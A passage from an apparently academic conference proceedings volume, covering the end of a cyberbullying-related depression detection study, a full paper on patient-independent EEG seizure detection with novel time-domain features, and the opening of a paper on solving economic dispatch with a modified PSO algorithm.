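          recall_score(y_te, y_pred, zero_division=0))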

4 Results and Discussion

In this section, we present the comparative result analysis for CB detection using
precision (P), accuracy (A), and recall (R) [5] (all expressed in percentages). All
experiments were performed using tenfold cross-validation.

4.1 Results Obtained When TF-IDF Was Used for Feature Extraction

Table 1 shows the results obtained, where RF yielded the highest A of around 93.4%, followed by NB and MLP. The lowest A was obtained using SVM.

Fig. 2 System architecture

Table 1 Result obtained by applying TF-IDF and ML


Measure RF NB MLP SVM
A 93.44 93.33 92.99 87.04
P 92.25 91.2 90.0 82.57
R 92.38 90.43 89.0 87.23

4.2 Results Obtained When Word2Vec Was Used for Feature Extraction

Table 2 shows the results, where a similar trend was observed: RF yielded the highest A of around 90.36%, followed by NB and MLP, with the lowest A obtained using SVM. Hence, we infer that better prediction accuracy was obtained with TF-IDF than with Word2Vec.
Among all the classical models, RF combined with ROS demonstrated the best performance in binary classification under class imbalance. Feature generation with ROS at the preprocessing stage proved to be an effective way of handling class imbalance.

Table 2 Result obtained by applying Word2Vec and ML


Measure RF NB MLP SVM
A 90.36 90.11 87.88 81.09
P 88.96 88.86 84.63 73.81
R 87.34 86.22 85.22 83.79

Table 3 Result obtained by applying GloVe and DL

Measure RNN CNN Hybrid
A 94.24 94.49 95.9
P 91.89 85.19 92.79
R 90.01 75.48 94.14

Fig. 3 Comparative analysis of the applied techniques using accuracy

4.3 Results Obtained When DL Was Applied for CBMD Detection

Table 3 shows the results obtained by applying RNN, CNN, and Conv-RNN (hybrid) using GloVe [4], with ROS applied prior to training.
From Table 3, it is observed that the hybrid Conv-RNN yielded the highest accuracy of around 96%, followed by CNN (95%) and RNN (94%). Among all the applied classical ML techniques, the highest accuracy was reported with RF for binary classification. Our findings also showed that the DL-based techniques outperformed the ML techniques previously applied to the same dataset for CBMD and N-CBMD detection (as depicted in Fig. 3).
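To make the hybrid architecture concrete, a minimal sketch of a Conv-RNN for binary CBMD versus N-CBMD classification is given below in Keras; the layer sizes, vocabulary size, and sequence length are illustrative assumptions rather than the exact configuration used in our experiments, and in practice the embedding layer would be initialized with GloVe vectors.

# Hedged sketch of a Conv-RNN (convolutional layer followed by an LSTM layer).
# Hyperparameters are assumptions for illustration only.
import numpy as np
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Embedding, Conv1D, MaxPooling1D, LSTM, Dense

vocab_size, seq_len, embed_dim = 20000, 100, 100   # assumed sizes

model = Sequential([
    Embedding(vocab_size, embed_dim),               # in practice loaded with GloVe weights
    Conv1D(64, 5, activation="relu"),               # local n-gram features
    MaxPooling1D(2),
    LSTM(64),                                       # sequential context
    Dense(1, activation="sigmoid"),                 # CBMD probability
])
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])

dummy_batch = np.random.randint(0, vocab_size, size=(2, seq_len))   # two fake padded posts
print(model.predict(dummy_batch).shape)             # (2, 1) probability per post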

5 Conclusion

Mental distress is a sensitive field that has attracted the attention of practitioners and researchers for decades. In this research, we performed a comparative analysis

of machine learning and deep learning techniques on the dataset we synthesized from Twitter and Reddit, which focused primarily on depressive tweets and posts. From this dataset, we identified through manual annotation the samples that were depressive owing to CB victimization, with the remaining samples being depressive due to any other reason (binary classification: CBMD and N-CBMD). The resulting dataset was quite imbalanced. We employed random over-sampling with feature generation at the preprocessing step, which proved to be a methodical technique for handling class imbalance in binary classification. We then applied various ML and DL techniques to this dataset and obtained encouraging results. From the results, we conclude that DL produces higher accuracy than baseline supervised ML techniques for observing signs of depression (mental distress) caused by online bullying. The dataset distribution also shows that, although CB is not the major cause of mental illness, it is one of the most prominent causes of depression expressed on SM.

6 Future Trends

This work will be beneficial for netizens who often use social networking sites and are susceptible to mental illness. The problem is widespread, but it is particularly acute in countries such as India, where having and discussing mental distress is still considered a taboo. There, people rarely discuss their mental state and are unwilling to seek help from professionals; often they are not even able to recognize and accept their own mental illness. Thus, an implicit method for automatic detection is the need of the hour, as it would aid in the careful observation of indications of mental distress among users of social networking sites. Along the same lines, we intend to build a robust real-time method that can help netizens identify and analyze a depressed state of mind due to CB in an efficient way. This work could be augmented by implementing it for Android systems (for example, apps for mobiles and tablets) that connect users to doctors and professionals in the relevant field. This would eventually help depressed individuals discuss their state of mind, mental health problems, and other issues they have faced due to CB, and the application would be more useful if made available to the general public. The approach can also be exploited in other domains such as anxiety-disorder detection. Finally, other soft computing models (such as hierarchical attention networks and feature optimization) could be applied for further testing and analysis.

References

1. Depression-World Health Organization. https://www.who.int/news-room/fact-sheets/detail/depression
2. Viner, R. M., Aswathikutty-Gireesh, A., Stiglic, N., Hudson, L. D., Goddings, A.-L., Ward,
J. L., & Nicholls, D. E.: Roles of cyberbullying, sleep and physical activity in mediating the
effects of social media use on mental health and wellbeing among young people in England: A
secondary analysis of longitudinal data. Journal of The Lancet Child and Adolescent Health,
3(10), 685–696 (2019). https://doi.org/10.1016/s2352-4642(19)30186-5
3. Kumar, A., & Sachdeva, N. (2020) Cyberbullying checker: Online bully content detection using
hybrid supervised learning. In International Conference on Intelligent Computing and Smart
Communication 2019 (pp. 371–382). Springer, Singapore.
4. Kumar, A., & Sachdeva, N. (2020) Multi-input integrative learning using deep neural networks
and transfer learning for cyberbullying detection in real-time code-mix data. Journal of
Multimedia Systems, 66. https://doi.org/10.1007/s00530-020-00672-7
5. Kumar, A., & Sachdeva, N. (2019). Cyberbullying detection on social multimedia using soft
computing techniques: A meta-analysis. Journal Multimedia Tools Appl, 78, 23973–24010.
https://doi.org/10.1007/s11042-019-7234-z
6. Cénat, J. M., Hébert, M., Blais, M., Lavoie, F., Guerrier, M., & Derivois, D. (2014). Cyber-
bullying, psychological distress and self-esteem among youth in Quebec schools. Journal of
Affective Disorders, 169, 7–9. https://doi.org/10.1016/j.jad.2014.07.019
7. Sri Nandhini, B., & Sheeba, J. I. (2015, March). Cyberbullying detection and classification
using information retrieval algorithm. In ICARCSET ‘15: Proceedings of the 2015 Interna-
tional Conference on Advanced Research in Computer Science Engineering and Technology
(ICARCSET 2015), 20, 1–5. https://doi.org/10.1145/2743065.2743085.
8. Sri Nandhini, B., & Sheeba, J. I. (2015). Online social network bullying detection using intel-
ligence techniques. In International Conference on Advanced Computing Technologies and
Applications (ICACTA-2015), Procedia Computer Science (Vol 45. pp. 485–492). Elsevier.
9. Frommholz, I., Al-Khateeb, H. M., & Potthast, M. et al. (2016). On textual analysis and
machine learning for cyberstalking detection. Datenbank Spektrum, 16, 127–135. https://doi.
org/10.1007/s13222-016-0221-x
10. Radovic, A., Gmelin, T., Stein, B. D., & Miller, E. (2017). Depressed adolescents’ positive and
negative use of social media. Journal of Adolescence, 55, 5–15. https://doi.org/10.1016/j.ado
lescence.2016.12.002
11. Torous, J., Larsen, M. E., Depp, C., Cosco, T. D., Barnett, I., Nock, M. K., & Firth, J. .(2018).
Smartphones, sensors, and machine learning to advance real-time prediction and interventions
for suicide prevention: A review of current progress and next steps. Current Psychiatry Reports,
20(7).
12. Talpur, B. A., & O'Sullivan, D. (2020). Cyberbullying severity detection: A machine learning approach. PLoS ONE, 15(10), e0240924.
13. Zhao, R., Zhou, A., & Mao, K. (2016). Automatic detection of cyberbullying on social networks based on bullying features. In Proceedings of the 17th International Conference on Distributed Computing and Networking (pp. 1–6).
14. Sachdeva, N., Renu D., and Akshi K.: Empirical analysis of Machine Learning Techniques for
context aware Recommender Systems in the environment of IoT. In Proceedings of the Inter-
national Conference on Advances in Information Communication Technology & Computing,
pp. 1–7.
15. Kumar, A., Nitin S., & A. (2017). Analysis of GA optimized ANN for proactive context aware
recommender system. In International Conference on Health Information Science (pp. 92–
102). Springer ,Cham.
16. Kumar, A., & Jaiswal, A. (2020). Deep learning based sentiment classification on user-
generated big data. In Recent advances in computer science and communications (Formerly:
Recent Patents on Computer Science) (Vol 13.5, pp. 1047–1056).

17. Kumar, A., & Jaiswal, A. (2020). A deep swarm-optimized model for leveraging industrial data
analytics in cognitive manufacturing. IEEE Transactions on Industrial Informatics. https://doi.
org/10.1109/TII.2020.3005532
18. Kumar, A., Jaiswal, A., Garg, S., Verma, S., & Kumar, S. (2019). Sentiment analysis using
cuckoo search for optimized feature selection on Kaggle tweets. International Journal of
Information Retrieval Research (IJIRR), 9(1), 1–15.
19. Kumar, A., & Garg, G. (2019). Sentiment analysis of multimodal twitter data. Multimedia Tools
and Applications, 78(17), 24103–24119.
20. Kumar, A., & Sachdeva, N. (2021). Multimodal cyberbullying detection using capsule network
with dynamic routing and deep convolutional neural network. Multimedia Systems, 1–10.
Improved Patient-Independent Seizure
Detection System Using Novel Feature
Extraction Techniques

Durgesh Nandini, Jyoti Yadav, Asha Rani, and Vijander Singh

Abstract The objective of this research work is to design an improved patient-independent seizure detection system. In general, most of the patient-dependent EEG-
based seizure detection algorithms suffer from poor accuracy when applied to new
patients. Therefore, a generalized approach is suggested to design seizure detection
systems without the need of model retraining for new patients. This research work
proposes two novel time-domain feature extraction techniques, namely “Max–Min”
and “Variation” methods. The features are extracted using segment-based patient-
independent method from the ictal and interictal signal regions. Various machine
learning algorithms are used in this work for seizure detection. The experimentation
is performed on a publicly available CHB MIT EEG scalp dataset. The max–min
method results in the highest classification accuracy of 97.82% using the decision
tree algorithm, whereas the variation method provides a classification accuracy of 92.40% using the scalable tree boosting algorithm. The proposed methods show improved accuracy as compared to the state-of-the-art methods.

Keywords Epilepsy · Seizure · Machine learning · Decision tree · XGB · Patient-independent

D. Nandini (B) · J. Yadav · A. Rani · V. Singh
Department of Instrumentation and Control Engineering, Netaji Subhas University of Technology,
New Delhi, India
e-mail: durgesh.ic18@nsut.ac.in
J. Yadav
e-mail: Jyoti.yadav@nsut.ac.in
A. Rani
e-mail: asha.rani@nsut.ac.in
V. Singh
e-mail: vijaydee@nsut.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_71

1 Introduction

Epilepsy is a neurological disease which severely impacts the lives of many patients.
At present, 65 million people worldwide are affected by this disease. An epileptic
seizure results in abnormal sensations that may range from the twitching of arms
to severe injuries and may even lead to death after strokes. Significant research
is carried out to detect epilepsy using electroencephalogram (EEG) signals. Sriraam and Raghu [1] utilized the Bern-Barcelona EEG database to identify focal and non-focal seizures. EEG signals were segmented into windows of 10 s duration and pre-processed using a fourth-order Butterworth band-pass filter in the frequency range of 0.5–150 Hz. Feature extraction in the time and frequency domains was carried out along with information-theoretic and statistical features, and the SVM classification algorithm achieved the highest sensitivity, specificity, and classification accuracy. Chakrabarti et al. [2] employed a real-time microcontroller-based prototype; low power consumption, quick and accurate seizure detection, and easy software compatibility are a few attributes of the proposed prototype. The EEG signals are pre-processed using an LPF and features are extracted using the discrete wavelet transform (DWT), with Daubechies, Symlet, Bi-orthogonal, and Coiflet mother wavelets employed for multi-resolution analysis of the signals; results reveal high classification accuracy using the ANN classifier. Zabihi et al. [3] presented a patient-dependent approach employing two-layer classification to detect seizures using linear discriminant analysis and an artificial neural network. Selvakumari et al. [10] carried out their work on 12 channels placed in the parietal and occipital lobes; the work presented by them is patient-dependent and obtains an accuracy of 95.63%. Correa et al. [4] developed an algorithm for real-time and offline modes, based on adaptive filters, signal averaging, and thresholds for seizure detection. Sadeghzadeh et al. [5] introduced a two-level patient-dependent approach for seizure detection, using three-level feature extraction from the pre-ictal stage of the EEG signal; these signals are matched with a pre-defined threshold value to conclude the likelihood of seizure occurrence. Fasil et al. [6] removed unwanted noise from the EEG signals using a Butterworth filter, applied differential decomposition methods for signal decomposition, and then extracted log-entropy and signal energy, obtaining an accuracy of 86% with the SVM algorithm. Raghu et al. [7] presented a study of the dynamic characteristics of EEG signals, applying a modified version of the DWT, the maximal overlap discrete wavelet transform, to analyse EEG signals; the highest classification accuracy obtained for CHB-MIT is 94.51%. Raghu and Sriraam [8] extracted features in the time as well as the frequency domain, and the SVM classifier yields good results with an accuracy of 96.1%. Yang et al. [9] developed a novel patient-independent seizure detection method and also performed a patient-dependent analysis. Results reveal better classification accuracy for the patient-dependent study [10], but such models are difficult to apply to new patients.
Medical experts diagnose epilepsy by visually analyzing and inspecting EEG recordings. This manual process is time-consuming, tedious, and susceptible to human error [9], especially with the rise of 5 million new epileptic

patients per year. These issues may be effectively resolved using efficient feature extraction and machine learning-based classification techniques. Furthermore, scalp EEG measures brain activity from the surface of the head in an easier, more reliable, and more affordable way than invasive EEG recordings. Therefore, in this work, the non-invasive CHB-MIT scalp EEG dataset is used to design a patient-independent epileptic seizure detection model. Two novel patient-independent, segment-based, time-domain feature extraction techniques, i.e., the "Max–Min" and "Variation" methods, are proposed. The feature extraction techniques are designed by considering the ictal and interictal stages of a seizure. Various ML techniques are considered to classify the signals into seizure and non-seizure categories, and a performance comparison of the results obtained using these ML algorithms is also performed. It is observed that the results obtained using the proposed novel techniques are better than those of conventional methods. Further, the performance of the proposed epilepsy detection system is analyzed using various performance metrics.
The organization of this paper is as follows: Section 2 explains the suggested methodology of feature extraction and classification. Section 3 presents the obtained results and discussion. Lastly, Sect. 4 presents the conclusion of this work.

2 Methodology

The epileptic seizure detection system suggested in this research work comprises
signal acquisition, pre-processing, feature extraction and selection, and classification
stages. Figure 1 gives a schematic illustration of the epilepsy detection model.
The publicly available CHB MIT dataset consisting of scalp EEG recordings
from 22 subjects is considered for experimentation. The database is collected from 5
males and 17 females in the age group of 3–22 years and 1.5–19 years, respectively.
The recording of the scalp EEG is done using the international 10–20 electrode
position standards. The pre-processing of data involves the removal of unwanted
signal, power-line noise, and artifacts from the EEG signal. The CHB-MIT scalp

Fig. 1 Schematic illustration of the epileptic seizure detection model



EEG data is pre-processed using the 4th-order Butterworth band-pass filter in the
frequency band of 0.5–32 Hz. This study includes all the channels except the duplicate
EEG channel "T8-P8." The EEG signal is segmented into small segments by applying a non-overlapping sliding window of 6 s duration [9]. The recordings for patients 12 and 16 are excluded from this study owing to their short interictal and ictal regions.
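A minimal sketch of this pre-processing step is shown below using SciPy; the 256 Hz sampling rate and the synthetic signal are illustrative assumptions made only so that the filtering and 6 s segmentation can be demonstrated end to end.

# Hedged sketch: 4th-order Butterworth band-pass (0.5–32 Hz) and 6 s segmentation.
# The sampling rate fs and the random signal are assumptions for illustration.
import numpy as np
from scipy.signal import butter, filtfilt

fs = 256                                    # assumed sampling rate (Hz)
raw = np.random.randn(fs * 60)              # stand-in for one channel of scalp EEG (60 s)

b, a = butter(N=4, Wn=[0.5, 32], btype="bandpass", fs=fs)
filtered = filtfilt(b, a, raw)              # zero-phase band-pass filtering

win = 6 * fs                                # non-overlapping 6 s windows
segments = filtered[: len(filtered) // win * win].reshape(-1, win)
print(segments.shape)                       # (number of 6 s segments, samples per segment)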
The seizure regions are characterized by oscillatory patterns, sharp spikes, and a
rapid sequence of the fast action potential in the EEG signal. These characteristics
are used to design an epileptic seizure detection model. In this work, the EEG scalp
database is used to extract “Max–min” and ‘Variation’ based features. These feature
sets are derived using segment-based approaches [9, 10]. The operation involves
the study of epileptiform activity for seizure analysis. The ictal and interictal signal
segments are considered in the analysis. The ictal regions are the regions associated
with the occurrence of seizure attacks. The region in the EEG signal that occurs
between the seizures is known as the interictal region.

2.1 Feature Set 1: Max–Min Method

The Max–Min method is a variant of the method proposed by Yang et al. [9]. However, this method focuses on extracting the maximum and minimum values from the ictal
and interictal regions. The Max–Min procedure for feature extraction is given as
follows:
1. The ictal and the interictal region are divided into smaller windows using a
non-overlapping window of 6 s each in duration.
2. The maximum (pi ) and minimum (qi ) values corresponding to each 6 s region
for all channels are retrieved and stored as multiple pairs of maximum and
minimum values corresponding to the ictal and interictal region.
3. A one-dimensional array (pqabs ) is created that gives the absolute difference
between the maximum and minimum values.

pq_abs = [|p_1 − q_1|, |p_2 − q_2|, |p_3 − q_3|, …, |p_i − q_i|]    (1)

4. Lastly, the various time-domain statistical features, i.e., minimum, maximum,


mean, standard deviation, and variance corresponding to all EEG channels are
computed.
The interictal activity is longer in comparison to the ictal activity. Therefore, the
duration of the ictal activity is taken as a reference for feature extraction. The first
10-min duration of the interictal region is not considered in this study.
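A compact sketch of steps 1–4 is given below in NumPy; the per-window maxima, minima, and per-channel statistics mirror the description above, while the array shapes and synthetic segment data are assumptions used only for illustration.

# Hedged sketch of the Max–Min feature set: per-window max/min, their absolute
# difference (Eq. 1), and summary statistics per channel. Shapes are assumptions.
import numpy as np

n_channels, n_windows, win_len = 22, 10, 6 * 256             # assumed dimensions
segments = np.random.randn(n_channels, n_windows, win_len)   # stand-in for 6 s windows

p = segments.max(axis=2)                 # maximum value per channel per window
q = segments.min(axis=2)                 # minimum value per channel per window
pq_abs = np.abs(p - q)                   # Eq. (1): absolute max–min difference

features = np.stack([pq_abs.min(axis=1), pq_abs.max(axis=1), pq_abs.mean(axis=1),
                     pq_abs.std(axis=1), pq_abs.var(axis=1)], axis=1)
print(features.shape)                    # (channels, 5 statistical features)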

2.2 Feature Set 2: The Variation Method

This method is an extension of the Max–Min method and uses the maximum (pi )
and minimum (qi ) values corresponding to ictal and interictal regions. The mean of
the maximum values corresponding to the ictal and interictal regions is subtracted
from all maximum and minimum values. This method provides information about the average maximum and minimum values for the seizure and non-seizure regions and about the difference between these mean values and the individual ictal and interictal values. In total, 76,111 voltage values are calculated for all the subjects.


mean_ictal = Σ_{i=0}^{k} p_i    (2)

mean_inter = Σ_{i=0}^{k} q_i    (3)

ictal_var_max = p_i − mean_ictal    (4)

ictal_var_min = q_i − mean_ictal    (5)

inter_var_max = p_i − mean_inter    (6)

inter_var_min = q_i − mean_inter    (7)
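Continuing in the same spirit, a rough sketch of the Variation features of Eqs. (2)–(7) is given below; the per-window maxima and minima are regenerated from synthetic data, and reading the means in Eqs. (2)–(3) as averages of those values is an interpretation based on the textual description above.

# Hedged sketch of the Variation feature set (Eqs. 2–7). p and q are stand-ins for
# the per-window maxima and minima of the Max–Min sketch; shapes are assumptions.
import numpy as np

p = np.random.randn(22, 10)                  # per-window maxima (channels x windows)
q = p - np.abs(np.random.randn(22, 10))      # per-window minima (always <= p)

mean_ictal = p.mean(axis=1, keepdims=True)   # Eq. (2), read as an average of the maxima
mean_inter = q.mean(axis=1, keepdims=True)   # Eq. (3), read as an average of the minima

ictal_var_max = p - mean_ictal               # Eq. (4)
ictal_var_min = q - mean_ictal               # Eq. (5)
inter_var_max = p - mean_inter               # Eq. (6)
inter_var_min = q - mean_inter               # Eq. (7)
print(ictal_var_max.shape, inter_var_min.shape)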

2.3 Classification

This work demonstrates a comparison of different ML algorithms, i.e., support vector machine (SVM), logistic regression, K-nearest neighbor (KNN), random forest (RF), decision tree (DTree), Naïve Bayes (NB), AdaBoost, gradient boosting (GBDT), the scalable tree boosting algorithm (XGB), and extra trees (ETree), for the detection and classification of epileptic seizures. In the case of SVM, Gaussian (rbfSVM) and linear (lSVM) kernel functions are considered. The value of k is set to 6 for the KNN algorithm, whereas logistic regression uses both L1 and L2 regularization. The Naïve Bayes algorithm (NBayes) uses a Gaussian kernel, and the number of trees in the RF and ETree algorithms is taken as 10 with the entropy criterion. The number of boosting stages for GBDT, AdaBoost, and XGB is taken as 100 with a default learning rate of 0.1, and the maximum depth is set to 3. In the decision tree algorithm, the entropy criterion is used. Decision trees are a non-parametric, highly interpretable, and easy-to-understand classification algorithm in which the decision model is created by learning simple decision rules; they have low model complexity and fast running speed [9]. The scalable tree boosting algorithm (XGB) is a faster-running version of the gradient boosting decision tree algorithm. The performance of the ML classifiers is evaluated using the confusion matrix, and performance evaluation is further carried out using accuracy, Matthews correlation coefficient (MCC), sensitivity, Cohen's kappa metric, and specificity [9].

3 Results and Discussion

This research work presents a segment-based patient-independent approach to detect epileptic seizures using the ML algorithms. The CHB-MIT EEG scalp dataset is
considered for the analysis. The raw EEG signals are pre-processed and segmented
into non-overlapping windows for feature extraction. The ML algorithms are consid-
ered for the classification of signals as seizure/non-seizure. The extracted feature dataset is divided into 75% training and 25% testing sets, and the obtained results are validated using the tenfold cross-validation method. The performance of the ML classifiers is tested on the two feature sets. Table 1 lists the ML algorithms used in this study along with their hyperparameter values.

Table 1 Specifications of the considered ML algorithms


S. No ML algorithm Hyperparameters
1 SVM Gaussian Kernel (rbfSVM)
Linear Kernel function (lSVM)
2 KNN Number of neighbors = 6
3 Logistic regression L1 regularization, random_state = 0
L2 regularization, random_state = 0
4 RF Number of estimators = 10, criterion = ‘entropy’,
random_state = 0
5 NBayes Gaussian kernel
6 DTree Entropy criterion, random_state = 0
7 Adaboost Number of estimators = 100, random_state = 0
8 GBDT Number of estimators = 100, learning_rate = 1.0,
random_state = 0, maximum_depth = 1
9 XGB Number of estimators = 100, learning_rate = 1.0,
random_state = 0, maximum_depth = 4
10 ETree Number of estimators = 10, min_samples_split = 2

Fig. 2 Graphical illustration of Max–Min feature extraction technique

3.1 Seizure Detection ML Model Based on Max–Min Feature Set

The Max–Min method extracts the maximum and minimum values from the ictal
and interictal region of the CHB MIT EEG dataset. Then, the absolute difference
between the maximum and the minimum values is evaluated. Finally, the minimum,
maximum, mean, standard deviation, and variance values corresponding to all the
channels are calculated. For example, there are 7 seizure files and 35 non-seizure files for subject chb01. The duration of the seizure files is taken as a reference, and the duration of the interictal region is chosen randomly such that it matches the duration of the ictal region. Each ictal and interictal region is divided into non-overlapping windows of 6 s each. The seizure duration in the chb01_03.edf file is 40 s, so 22 × ⌈40/6⌉ = 22 × 7 = 154 pairs of maximum and minimum voltage values are obtained for this file. Similarly, the voltage values corresponding to all the EEG channels are calculated, resulting in a total of 38,044 pairs of voltage values.
Figure 2 graphically illustrates the proposed Max–Min feature extraction method.
The performance of the ML classifier using the Max–Min method is depicted in
Fig. 3. The graph shows that the highest accuracy of 97.82% is achieved using the
decision tree classifier.

3.2 Seizure Detection ML Model Using Variation Feature Set

Figure 4 graphically illustrates the concept of feature extraction using the variation
method. The variation method works on a principle similar to the Max–Min method. In
this, the mean maximum values are calculated corresponding to the ictal and interictal
regions. Later, the absolute difference between the maximum value and mean value
is calculated. Similarly, the absolute difference between the minimum and mean

Fig. 3 Seizure detection performance comparison of machine learning algorithms using the max–min method

Fig. 4 Graphical illustration of variation feature extraction technique

values is obtained. The variation method performance analysis using various ML


classifiers is shown in Fig. 5. It achieves the highest accuracy of 92.40% using
the XGB algorithm. The decision tree algorithm gives an accuracy of 91.38%. The
performance metrics for the proposed Max–Min and Variation methods are shown
in Table 2.
The performance comparison of the suggested methodology with traditional techniques from the literature is shown in Table 3. Yang et al. [9] achieved classification with an accuracy of 0.8627; their model used 30 features optimized using the BackFS filter method. Chakrabarti et al. [2] achieved the highest classification accuracy of 0.9530. In contrast, the proposed Max–Min method uses 5 features and achieves an accuracy of 0.9782, which is 11.55% greater than the method discussed in [9]. The results also reveal that the proposed scheme achieves higher accuracy than the methods employed by Yang et al. [9] and Chakrabarti et al. [2].

Fig. 5 Seizure detection performance comparison of machine learning algorithms using the variation method

Table 2 Comparative analysis of the performance metrics for the proposed seizure detection model

Method            ML algorithm  Accuracy (%)  Sensitivity (%)  Specificity (%)  MCC (%)  Kappa (%)
Max–Min method    DTree         97.82         97.86            97.86            95.91    95.91
Variation method  XGB           92.40         95.03            95.03            85.02    84.90

Table 3 Comparative performance analysis with state-of-the-art methods

Paper                               Category             Accuracy (%)  Sensitivity (%)  Specificity (%)
Yang et al. [9]                     Patient-independent  86.27         80.32            92.22
Chakrabarti et al. [2]              Patient-independent  95.30         87.50            83.60
Proposed approach (Max–Min method)  Patient-independent  97.82         97.86            97.86

4 Conclusions

This research work proposes a patient-independent, segment-based approach for the detection of epileptic seizures by analysing ictal and interictal segments of EEG signals. The segment-based approach is a more targeted and fast approach for seizure detection. Two novel feature sets based on the Max–Min and Variation methods are extracted from the pre-processed database. Various ML algorithms are used to study the classification performance of the extracted features. The Max–Min method achieves the highest classification accuracy of 97.82% using the decision tree algorithm, and the Variation method provides the highest classification accuracy of 92.40% using the XGB algorithm. Thus, the Max–Min method achieves a classification accuracy 11.55 and 2.52 percentage points greater than the methods discussed in [9] and [2], respectively. It is also revealed that the suggested methods use no more than 5 features, thus reducing the data dimension to a large extent. In future, other stages of seizures may be classified with the help of integrated feature sets and various feature selection and channel selection methods.

References

1. Sriraam, N., & Raghu, S. (2017). Classification of focal and non focal epileptic seizures using
multi-features and SVM classifier. Journal of Medical Systems, 41(10), 1–14.
2. Chakrabarti, S., Swetapadma, A., Ranjan, A., & Pattnaik, P. K. (2020). Time domain imple-
mentation of pediatric epileptic seizure detection system for enhancing the performance of
detection and easy monitoring of pediatric patients. Biomedical Signal Processing and Control,
59, 101930.
3. Zabihi, M., Kiranyaz, S., Jäntti, V., Lipping, T., & Gabbouj, M. (2019). Patient-specific seizure
detection using nonlinear dynamics and nullclines. IEEE Journal of Biomedical and Health
Informatics, 24(2), 543–555.
4. Correa, A. G., Orosco, L. L., Diez, P., & Leber, E. L. (2019). Adaptive filtering for epileptic
event detection in the EEG. Journal of Medical and Biological Engineering, 39(6), 912–918.
5. Sadeghzadeh, H., Hosseini-Nejad, H., & Salehi, S. (2019). Real-time epileptic seizure predic-
tion based on online monitoring of pre-ictal features. Medical and Biological Engineering and
Computing, 57(11), 2461–2469.
6. Fasil, O. K., Rajesh, R., & Thasleema, T. M. (2018). Fusion of signal and differential signal
domain features for epilepsy identification in electroencephalogram signals. In Advances in
data and information sciences (pp. 127–135). Springer.
7. Raghu, S., Sriraam, N., Temel, Y., Rao, S. V., Hegde, A. S., & Kubben, P. L. (2019). Performance
evaluation of DWT based sigmoid entropy in time and frequency domains for automated
detection of epileptic seizures using SVM classifier. Computers in Biology and Medicine, 110,
127–143.
8. Raghu, S., & Sriraam, N. (2018). Classification of focal and non-focal EEG signals using
neighborhood component analysis and machine learning algorithms. Expert Systems with
Applications, 113, 18–32.
9. Yang, S., Li, B., Zhang, Y., Duan, M., Liu, S., Zhang, Y., Feng, X., Tan, R., Huang, L., & Zhou,
F. (2020). Selection of features for patient-independent detection of seizure events using scalp
EEG signals. Computers in Biology and Medicine, 119, 103671.
10. Selvakumari, R. S., Mahalakshmi, M., & Prashalee, P. (2019). Patient-specific seizure detection
method using hybrid classifier with optimized electrodes. Journal of Medical Systems, 43(5),
1–7.
Solution to Economic Dispatch Problem
Using Modified PSO Algorithm

Amritpal Singh and Aditya Khamparia

Abstract This research paper proposes a novel approach, an extension of the PSO algorithm, aimed at solving the economic dispatch problem. The economic dispatch problem is solved by minimizing the fuel cost of the generating units. Several constraints are incorporated in the calculation of the overall operating cost of power system operation. From the economic point of view, this problem is a matter of concern for most utilities and needs to be solved.

Keywords Economic dispatch · Unit commitment · PSO

1 Introduction

A power system comprises several power plants, and each power plant has several generating units [1]. Daily load patterns deviate sharply between peak and off-peak hours because the community uses less electrical energy on Saturdays than on weekdays, and less between midnight and early morning than during the day. If enough generation to meet the peak is kept online throughout the day, it is likely that some units will operate near their minimum generating threshold during the off-peak period. In most interconnected power systems, the power requirement is primarily met by thermal generation. Several operating strategies can satisfy the required power demand, and the most favorable operating strategy should be selected on a financial basis. That is to say, the decisive factor in power system operation is to meet the power demand at the least fuel cost. Furthermore, in order to provide high-quality electrical energy to consumers in a secure and cost-effective manner, economic dispatch is considered one of the best available alternatives.
The major outcomes of the research are given as follows:
• This research aims at solving the economic dispatch problem.

A. Singh (B) · A. Khamparia


Department of Computer Science and Engineering, Lovely Professional University, Punjab, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_72

• Formulated a novel approach that is an extension of the PSO algorithm.

2 Unit Commitment

Unit commitment belongs to a class of optimization problems used to decide the operating schedule of generators under changing loads. It involves how many units need to be put in the working state, how many units need to be put in an inactive state, and how much power each unit needs to generate to satisfy the load demand. Unit commitment, popularly known as the UC problem, is solved by minimizing the fuel, startup, and shutdown costs of the generating units. Many methods using some form of approximation and generalization have been proposed [2–5]. The UC problem can be formulated mathematically as given below (Eq. 1):

min f i (xit , u it−1 , u it ) (1)
x,u
i∈I t∈T

where f_i denotes the cost function, x_{it} the generation level, and u_{it} the unit's state.

The constraints which play a significant role are as follows:

2.1 Generation Capacity Constraint

For regular system operations, the actual power output of each unit is between its
upper and lower limits as follows (Eq. 2):

P_i^min ≤ P_i ≤ P_i^max    (2)

2.2 Power Balance Constraint

Equilibrium is reached when the net electricity generation is equal to the overall
demand and the actual power loss in transmission lines (Eq. 3):


Σ_{i=1}^{n} P_i = D + P_l    (3)

2.3 Generation Ramp Limits

The operational range of online generators is constrained by their limits on ramp rate
[6]. Three potential scenarios occur while the generator units are online.
• The generating unit operates in a steady state.
• The generating unit increases its generation of power.
• The generating unit decreases its generation of power.
As generation increases (Eq. 4),

P_{Zi} − P_{Zi}^0 ≤ UR_i    (4)

As generation decreases (Eq. 5),

P_{Zi}^0 − P_{Zi} ≤ DR_i    (5)

3 Introduction to Economic Dispatch (ED)

The economic dispatch problem deals with determining how much power each generating unit should produce for a given power demand, subject to minimizing the aggregate operational cost [7–11] (Eq. 6).

F_T = F_1 + F_2 + F_3 + · · · + F_N = Σ_{i=1}^{N} F_i(P_i)

φ = 0 = P_loss + P_load − Σ_{i=1}^{N} P_i    (6)

The objective function of the economic dispatch problem is defined as follows (Eq. 7).


n
 
min F = ai + bi Pi + ci Pi2 (7)
T
i=1

Here, F_T denotes the overall fuel cost, F_i(P_i) denotes the cost of the ith generating unit in $/h, P_i denotes the ith unit's power in MW, and n denotes the total number of generating units. Lastly, a_i, b_i, and c_i are the cost coefficients of the generating units.
